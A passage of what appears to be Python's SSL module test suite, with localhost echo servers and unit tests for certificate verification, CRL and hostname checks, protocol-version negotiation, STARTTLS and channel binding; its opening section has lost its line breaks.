def handle_error(self): raise def __init__(self, certfile): self.certfile = certfile sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.port = support.bind_port(sock, '') asyncore.dispatcher.__init__(self, sock) self.listen(5) def handle_accept(self): sock_obj, addr = self.accept() if support.verbose: sys.stdout.write(" server: new connection from %s:%s\n" %addr) self.ConnectionHandler(sock_obj, self.certfile) def handle_error(self): raise def __init__(self, certfile): self.flag = None self.active = False self.server = self.EchoServer(certfile) self.port = self.server.port threading.Thread.__init__(self) self.daemon = True def __str__(self): return "<%s %s>" % (self.__class__.__name__, self.server) def __enter__(self): self.start(threading.Event()) self.flag.wait() return self def __exit__(self, *args): if support.verbose: sys.stdout.write(" cleanup: stopping server.\n") self.stop() if support.verbose: sys.stdout.write(" cleanup: joining server thread.\n") self.join() if support.verbose: sys.stdout.write(" cleanup: successfully joined.\n") def start(self, flag=None): self.flag = flag threading.Thread.start(self) def run(self): self.active = True if self.flag: self.flag.set() while self.active: try: asyncore.loop(1) except: pass def stop(self): self.active = False self.server.close() def bad_cert_test(certfile): """ Launch a server with CERT_REQUIRED, and check that trying to connect to it with the given client certificate fails. 
""" server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_REQUIRED, cacerts=CERTFILE, chatty=False, connectionchatty=False) with server: try: with closing(socket.socket()) as sock: s = ssl.wrap_socket(sock, certfile=certfile, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) except ssl.SSLError as x: if support.verbose: sys.stdout.write("\nSSLError is %s\n" % x.args[1]) except OSError as x: if support.verbose: sys.stdout.write("\nOSError is %s\n" % x.args[1]) except OSError as x: if x.errno != errno.ENOENT: raise if support.verbose: sys.stdout.write("\OSError is %s\n" % str(x)) else: raise AssertionError("Use of invalid cert should have failed!") def server_params_test(client_context, server_context, indata=b"FOO\n", chatty=True, connectionchatty=False, sni_name=None): """ Launch a server, connect a client to it and try various reads and writes. """ stats = {} server = ThreadedEchoServer(context=server_context, chatty=chatty, connectionchatty=False) with server: with closing(client_context.wrap_socket(socket.socket(), server_hostname=sni_name)) as s: s.connect((HOST, server.port)) for arg in [indata, bytearray(indata), memoryview(indata)]: if connectionchatty: if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) s.write(arg) outdata = s.read() if connectionchatty: if support.verbose: sys.stdout.write(" client: read %r\n" % outdata) if outdata != indata.lower(): raise AssertionError( "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n" % (outdata[:20], len(outdata), indata[:20].lower(), len(indata))) s.write(b"over\n") if connectionchatty: if support.verbose: sys.stdout.write(" client: closing connection.\n") stats.update({ 'compression': s.compression(), 'cipher': s.cipher(), 'peercert': s.getpeercert(), 'client_alpn_protocol': s.selected_alpn_protocol(), 'client_npn_protocol': s.selected_npn_protocol(), 'version': s.version(), }) s.close() stats['server_alpn_protocols'] = server.selected_alpn_protocols 
        stats['server_npn_protocols'] = server.selected_npn_protocols
    return stats


def try_protocol_combo(server_protocol, client_protocol, expect_success,
                       certsreqs=None, server_options=0, client_options=0):
    """
    Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds,
    if it's false, assert that the connection fails.
    Also, if *expect_success* is a string, assert that it is the protocol
    version actually used by the connection.
    """
    if certsreqs is None:
        certsreqs = ssl.CERT_NONE
    # Human-readable name of the cert-requirement mode, for verbose output.
    certtype = {
        ssl.CERT_NONE: "CERT_NONE",
        ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
        ssl.CERT_REQUIRED: "CERT_REQUIRED",
    }[certsreqs]
    if support.verbose:
        # Braces in the format mark a combination expected to *fail*.
        formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
        sys.stdout.write(formatstr %
                         (ssl.get_protocol_name(client_protocol),
                          ssl.get_protocol_name(server_protocol),
                          certtype))
    client_context = ssl.SSLContext(client_protocol)
    client_context.options |= client_options
    server_context = ssl.SSLContext(server_protocol)
    server_context.options |= server_options

    # NOTE: we must enable "ALL" ciphers on the client, otherwise an
    # SSLv23 client will send an SSLv3 hello (rather than SSLv2)
    # starting from OpenSSL 1.0.0 (see issue #8322).
    if client_context.protocol == ssl.PROTOCOL_SSLv23:
        client_context.set_ciphers("ALL")

    # Both sides use the same self-signed cert as key and trust anchor.
    for ctx in (client_context, server_context):
        ctx.verify_mode = certsreqs
        ctx.load_cert_chain(CERTFILE)
        ctx.load_verify_locations(CERTFILE)
    try:
        stats = server_params_test(client_context, server_context,
                                   chatty=False, connectionchatty=False)
    # Protocol mismatch can result in either an SSLError, or a
    # "Connection reset by peer" error.
    except ssl.SSLError:
        if expect_success:
            raise
    except socket.error as e:
        if expect_success or e.errno != errno.ECONNRESET:
            raise
    else:
        if not expect_success:
            raise AssertionError(
                "Client protocol %s succeeded with server protocol %s!"
                % (ssl.get_protocol_name(client_protocol),
                   ssl.get_protocol_name(server_protocol)))
        elif (expect_success is not True
                and expect_success != stats['version']):
            # expect_success is a version string: pin the negotiated version.
            raise AssertionError("version mismatch: expected %r, got %r"
                                 % (expect_success, stats['version']))


class ThreadedTests(unittest.TestCase):

    @skip_if_broken_ubuntu_ssl
    def test_echo(self):
        """Basic test of an SSL client connecting to a server"""
        if support.verbose:
            sys.stdout.write("\n")
        # Run the echo round-trip once per supported protocol constant.
        for protocol in PROTOCOLS:
            context = ssl.SSLContext(protocol)
            context.load_cert_chain(CERTFILE)
            server_params_test(context, context,
                               chatty=True, connectionchatty=True)

    def test_getpeercert(self):
        # Verify getpeercert() behaviour before and after the handshake.
        if support.verbose:
            sys.stdout.write("\n")
        context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        context.verify_mode = ssl.CERT_REQUIRED
        context.load_verify_locations(CERTFILE)
        context.load_cert_chain(CERTFILE)
        server = ThreadedEchoServer(context=context, chatty=False)
        with server:
            s = context.wrap_socket(socket.socket(),
                                    do_handshake_on_connect=False)
            s.connect((HOST, server.port))
            # getpeercert() raise ValueError while the handshake isn't
            # done.
            with self.assertRaises(ValueError):
                s.getpeercert()
            s.do_handshake()
            cert = s.getpeercert()
            self.assertTrue(cert, "Can't get peer certificate.")
            cipher = s.cipher()
            if support.verbose:
                sys.stdout.write(pprint.pformat(cert) + '\n')
                sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
            if 'subject' not in cert:
                self.fail("No subject field in certificate: %s."
% pprint.pformat(cert)) if ((('organizationName', 'Python Software Foundation'),) not in cert['subject']): self.fail( "Missing or invalid 'organizationName' field in certificate subject; " "should be 'Python Software Foundation'.") self.assertIn('notBefore', cert) self.assertIn('notAfter', cert) before = ssl.cert_time_to_seconds(cert['notBefore']) after = ssl.cert_time_to_seconds(cert['notAfter']) self.assertLess(before, after) s.close() @unittest.skipUnless(have_verify_flags(), "verify_flags need OpenSSL > 0.9.8") def test_crl_check(self): if support.verbose: sys.stdout.write("\n") server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(SIGNING_CA) tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0) self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf) # VERIFY_DEFAULT should pass server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") # VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: with self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed"): s.connect((HOST, server.port)) # now load a CRL file. The CRL file is signed by the CA. 
context.load_verify_locations(CRLFILE) server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") def test_check_hostname(self): if support.verbose: sys.stdout.write("\n") server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.verify_mode = ssl.CERT_REQUIRED context.check_hostname = True context.load_verify_locations(SIGNING_CA) # correct hostname should verify server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket(), server_hostname="localhost")) as s: s.connect((HOST, server.port)) cert = s.getpeercert() self.assertTrue(cert, "Can't get peer certificate.") # incorrect hostname should raise an exception server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(context.wrap_socket(socket.socket(), server_hostname="invalid")) as s: with self.assertRaisesRegexp(ssl.CertificateError, "hostname 'invalid' doesn't match u?'localhost'"): s.connect((HOST, server.port)) # missing server_hostname arg should cause an exception, too server = ThreadedEchoServer(context=server_context, chatty=True) with server: with closing(socket.socket()) as s: with self.assertRaisesRegexp(ValueError, "check_hostname requires server_hostname"): context.wrap_socket(s) def test_empty_cert(self): """Connecting with an empty cert file""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "nullcert.pem")) def test_malformed_cert(self): """Connecting with a badly formatted certificate (syntax error)""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "badcert.pem")) def test_nonexisting_cert(self): """Connecting with a non-existing cert file""" 
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "wrongcert.pem")) def test_malformed_key(self): """Connecting with a badly formatted key (syntax error)""" bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir, "badkey.pem")) def test_rude_shutdown(self): """A brutal shutdown of an SSL server should raise an OSError in the client when attempting handshake. """ listener_ready = threading.Event() listener_gone = threading.Event() s = socket.socket() port = support.bind_port(s, HOST) # `listener` runs in a thread. It sits in an accept() until # the main thread connects. Then it rudely closes the socket, # and sets Event `listener_gone` to let the main thread know # the socket is gone. def listener(): s.listen(5) listener_ready.set() newsock, addr = s.accept() newsock.close() s.close() listener_gone.set() def connector(): listener_ready.wait() with closing(socket.socket()) as c: c.connect((HOST, port)) listener_gone.wait() try: ssl_sock = ssl.wrap_socket(c) except socket.error: pass else: self.fail('connecting to closed SSL socket should have failed') t = threading.Thread(target=listener) t.start() try: connector() finally: t.join() @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'), "OpenSSL is compiled without SSLv2 support") def test_protocol_sslv2(self): """Connecting to an SSLv2 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False) # SSLv23 client with specific SSL options if no_sslv2_implies_sslv3_hello(): # No SSLv2 => client will use an SSLv3 hello on 
recent OpenSSLs try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv2) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl def test_protocol_sslv23(self): """Connecting to an SSLv23 server with various client options""" if support.verbose: sys.stdout.write("\n") if hasattr(ssl, 'PROTOCOL_SSLv2'): try: try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True) except socket.error as x: # this fails on some older versions of OpenSSL (0.9.7l, for instance) if support.verbose: sys.stdout.write( " SSL2 client to SSL23 server test unexpectedly failed:\n %s\n" % str(x)) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3') try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1') if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED) # Server with specific SSL options if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, server_options=ssl.OP_NO_SSLv3) # Will choose TLSv1 try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 
False, server_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'), "OpenSSL is compiled without SSLv3 support") def test_protocol_sslv3(self): """Connecting to an SSLv3 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3') try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_SSLv3) try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False) if no_sslv2_implies_sslv3_hello(): # No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, 'SSLv3', client_options=ssl.OP_NO_SSLv2) @skip_if_broken_ubuntu_ssl def test_protocol_tlsv1(self): """Connecting to a TLSv1 server with various client options""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1') try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"), "TLS version 1.1 not supported.") def test_protocol_tlsv1_1(self): """Connecting to a TLSv1.1 server with various client options. 
Testing against older TLS versions.""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1') if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1_1) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1') try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False) @skip_if_broken_ubuntu_ssl @unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"), "TLS version 1.2 not supported.") def test_protocol_tlsv1_2(self): """Connecting to a TLSv1.2 server with various client options. Testing against older TLS versions.""" if support.verbose: sys.stdout.write("\n") try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2', server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2, client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,) if hasattr(ssl, 'PROTOCOL_SSLv2'): try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False) if hasattr(ssl, 'PROTOCOL_SSLv3'): try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False, client_options=ssl.OP_NO_TLSv1_2) try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2') try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False) try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False) def test_starttls(self): """Switching from clear text to encrypted and back again.""" msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6") server = 
ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_TLSv1, starttls_server=True, chatty=True, connectionchatty=True) wrapped = False with server: s = socket.socket() s.setblocking(1) s.connect((HOST, server.port)) if support.verbose: sys.stdout.write("\n") for indata in msgs: if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) if wrapped: conn.write(indata) outdata = conn.read() else: s.send(indata) outdata = s.recv(1024) msg = outdata.strip().lower() if indata == b"STARTTLS" and msg.startswith(b"ok"): # STARTTLS ok, switch to secure mode if support.verbose: sys.stdout.write( " client: read %r from server, starting TLS...\n" % msg) conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1) wrapped = True elif indata == b"ENDTLS" and msg.startswith(b"ok"): # ENDTLS ok, switch back to clear text if support.verbose: sys.stdout.write( " client: read %r from server, ending TLS...\n" % msg) s = conn.unwrap() wrapped = False else: if support.verbose: sys.stdout.write( " client: read %r from server\n" % msg) if support.verbose: sys.stdout.write(" client: closing connection.\n") if wrapped: conn.write(b"over\n") else: s.send(b"over\n") if wrapped: conn.close() else: s.close() def test_socketserver(self): """Using a SocketServer to create and manage SSL connections.""" server = make_https_server(self, certfile=CERTFILE) # try to connect if support.verbose: sys.stdout.write('\n') with open(CERTFILE, 'rb') as f: d1 = f.read() d2 = '' # now fetch the same data from the HTTPS server url = 'https://localhost:%d/%s' % ( server.port, os.path.split(CERTFILE)[1]) context = ssl.create_default_context(cafile=CERTFILE) f = urllib2.urlopen(url, context=context) try: dlen = f.info().getheader("content-length") if dlen and (int(dlen) > 0): d2 = f.read(int(dlen)) if support.verbose: sys.stdout.write( " client: read %d bytes from remote server '%s'\n" % (len(d2), server)) finally: f.close() self.assertEqual(d1, d2) def test_asyncore_server(self): """Check the example 
asyncore integration.""" indata = "TEST MESSAGE of mixed case\n" if support.verbose: sys.stdout.write("\n") indata = b"FOO\n" server = AsyncoreEchoServer(CERTFILE) with server: s = ssl.wrap_socket(socket.socket()) s.connect(('127.0.0.1', server.port)) if support.verbose: sys.stdout.write( " client: sending %r...\n" % indata) s.write(indata) outdata = s.read() if support.verbose: sys.stdout.write(" client: read %r\n" % outdata) if outdata != indata.lower(): self.fail( "bad data <<%r>> (%d) received; expected <<%r>> (%d)\n" % (outdata[:20], len(outdata), indata[:20].lower(), len(indata))) s.write(b"over\n") if support.verbose: sys.stdout.write(" client: closing connection.\n") s.close() if support.verbose: sys.stdout.write(" client: connection closed.\n") def test_recv_send(self): """Test recv(), send() and friends.""" if support.verbose: sys.stdout.write("\n") server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, cacerts=CERTFILE, chatty=True, connectionchatty=False) with server: s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) # helper methods for standardising recv* method signatures def _recv_into(): b = bytearray(b"\0"*100) count = s.recv_into(b) return b[:count] def _recvfrom_into(): b = bytearray(b"\0"*100) count, addr = s.recvfrom_into(b) return b[:count] # (name, method, whether to expect success, *args) send_methods = [ ('send', s.send, True, []), ('sendto', s.sendto, False, ["some.address"]), ('sendall', s.sendall, True, []), ] recv_methods = [ ('recv', s.recv, True, []), ('recvfrom', s.recvfrom, False, ["some.address"]), ('recv_into', _recv_into, True, []), ('recvfrom_into', _recvfrom_into, False, []), ] data_prefix = u"PREFIX_" for meth_name, send_meth, expect_success, args in send_methods: indata = (data_prefix + meth_name).encode('ascii') try: send_meth(indata, *args) outdata = 
s.read() if outdata != indata.lower(): self.fail( "While sending with <<{name:s}>> bad data " "<<{outdata:r}>> ({nout:d}) received; " "expected <<{indata:r}>> ({nin:d})\n".format( name=meth_name, outdata=outdata[:20], nout=len(outdata), indata=indata[:20], nin=len(indata) ) ) except ValueError as e: if expect_success: self.fail( "Failed to send with method <<{name:s}>>; " "expected to succeed.\n".format(name=meth_name) ) if not str(e).startswith(meth_name): self.fail( "Method <<{name:s}>> failed with unexpected " "exception message: {exp:s}\n".format( name=meth_name, exp=e ) ) for meth_name, recv_meth, expect_success, args in recv_methods: indata = (data_prefix + meth_name).encode('ascii') try: s.send(indata) outdata = recv_meth(*args) if outdata != indata.lower(): self.fail( "While receiving with <<{name:s}>> bad data " "<<{outdata:r}>> ({nout:d}) received; " "expected <<{indata:r}>> ({nin:d})\n".format( name=meth_name, outdata=outdata[:20], nout=len(outdata), indata=indata[:20], nin=len(indata) ) ) except ValueError as e: if expect_success: self.fail( "Failed to receive with method <<{name:s}>>; " "expected to succeed.\n".format(name=meth_name) ) if not str(e).startswith(meth_name): self.fail( "Method <<{name:s}>> failed with unexpected " "exception message: {exp:s}\n".format( name=meth_name, exp=e ) ) # consume data s.read() s.write(b"over\n") s.close() def test_handshake_timeout(self): # Issue #5103: SSL handshake must respect the socket timeout server = socket.socket(socket.AF_INET) host = "127.0.0.1" port = support.bind_port(server) started = threading.Event() finish = False def serve(): server.listen(5) started.set() conns = [] while not finish: r, w, e = select.select([server], [], [], 0.1) if server in r: # Let the socket hang around rather than having # it closed by garbage collection. 
conns.append(server.accept()[0]) for sock in conns: sock.close() t = threading.Thread(target=serve) t.start() started.wait() try: try: c = socket.socket(socket.AF_INET) c.settimeout(0.2) c.connect((host, port)) # Will attempt handshake and time out self.assertRaisesRegexp(ssl.SSLError, "timed out", ssl.wrap_socket, c) finally: c.close() try: c = socket.socket(socket.AF_INET) c = ssl.wrap_socket(c) c.settimeout(0.2) # Will attempt handshake and time out self.assertRaisesRegexp(ssl.SSLError, "timed out", c.connect, (host, port)) finally: c.close() finally: finish = True t.join() server.close() def test_server_accept(self): # Issue #16357: accept() on a SSLSocket created through # SSLContext.wrap_socket(). context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(CERTFILE) context.load_cert_chain(CERTFILE) server = socket.socket(socket.AF_INET) host = "127.0.0.1" port = support.bind_port(server) server = context.wrap_socket(server, server_side=True) evt = threading.Event() remote = [None] peer = [None] def serve(): server.listen(5) # Block on the accept and wait on the connection to close. evt.set() remote[0], peer[0] = server.accept() remote[0].recv(1) t = threading.Thread(target=serve) t.start() # Client wait until server setup and perform a connect. evt.wait() client = context.wrap_socket(socket.socket()) client.connect((host, port)) client_addr = client.getsockname() client.close() t.join() remote[0].close() server.close() # Sanity checks. 
self.assertIsInstance(remote[0], ssl.SSLSocket) self.assertEqual(peer[0], client_addr) def test_getpeercert_enotconn(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with closing(context.wrap_socket(socket.socket())) as sock: with self.assertRaises(socket.error) as cm: sock.getpeercert() self.assertEqual(cm.exception.errno, errno.ENOTCONN) def test_do_handshake_enotconn(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) with closing(context.wrap_socket(socket.socket())) as sock: with self.assertRaises(socket.error) as cm: sock.do_handshake() self.assertEqual(cm.exception.errno, errno.ENOTCONN) def test_default_ciphers(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) try: # Force a set of weak ciphers on our client context context.set_ciphers("DES") except ssl.SSLError: self.skipTest("no DES cipher available") with ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_SSLv23, chatty=False) as server: with closing(context.wrap_socket(socket.socket())) as s: with self.assertRaises(ssl.SSLError): s.connect((HOST, server.port)) self.assertIn("no shared cipher", str(server.conn_errors[0])) def test_version_basic(self): """ Basic tests for SSLSocket.version(). More tests are done in the test_protocol_*() methods. """ context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) with ThreadedEchoServer(CERTFILE, ssl_version=ssl.PROTOCOL_TLSv1, chatty=False) as server: with closing(context.wrap_socket(socket.socket())) as s: self.assertIs(s.version(), None) s.connect((HOST, server.port)) self.assertEqual(s.version(), "TLSv1") self.assertIs(s.version(), None) @unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL") def test_default_ecdh_curve(self): # Issue #21015: elliptic curve-based Diffie Hellman key exchange # should be enabled by default on SSL contexts. context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.load_cert_chain(CERTFILE) # Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled # explicitly using the 'ECCdraft' cipher alias. 
Otherwise, # our default cipher list should prefer ECDH-based ciphers # automatically. if ssl.OPENSSL_VERSION_INFO < (1, 0, 0): context.set_ciphers("ECCdraft:ECDH") with ThreadedEchoServer(context=context) as server: with closing(context.wrap_socket(socket.socket())) as s: s.connect((HOST, server.port)) self.assertIn("ECDH", s.cipher()[0]) @unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES, "'tls-unique' channel binding not available") def test_tls_unique_channel_binding(self): """Test tls-unique channel binding.""" if support.verbose: sys.stdout.write("\n") server = ThreadedEchoServer(CERTFILE, certreqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1, cacerts=CERTFILE, chatty=True, connectionchatty=False) with server: s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) # get the data cb_data = s.get_channel_binding("tls-unique") if support.verbose: sys.stdout.write(" got channel binding data: {0!r}\n" .format(cb_data)) # check if it is sane self.assertIsNotNone(cb_data) self.assertEqual(len(cb_data), 12) # True for TLSv1 # and compare with the peers version s.write(b"CB tls-unique\n") peer_data_repr = s.read().strip() self.assertEqual(peer_data_repr, repr(cb_data).encode("us-ascii")) s.close() # now, again s = ssl.wrap_socket(socket.socket(), server_side=False, certfile=CERTFILE, ca_certs=CERTFILE, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1) s.connect((HOST, server.port)) new_cb_data = s.get_channel_binding("tls-unique") if support.verbose: sys.stdout.write(" got another channel binding data: {0!r}\n" .format(new_cb_data)) # is it really unique self.assertNotEqual(cb_data, new_cb_data) self.assertIsNotNone(cb_data) self.assertEqual(len(cb_data), 12) # True for TLSv1 s.write(b"CB tls-unique\n") peer_data_repr = s.read().strip() self.assertEqual(peer_data_repr, repr(new_cb_data).encode("us-ascii")) s.close() def 
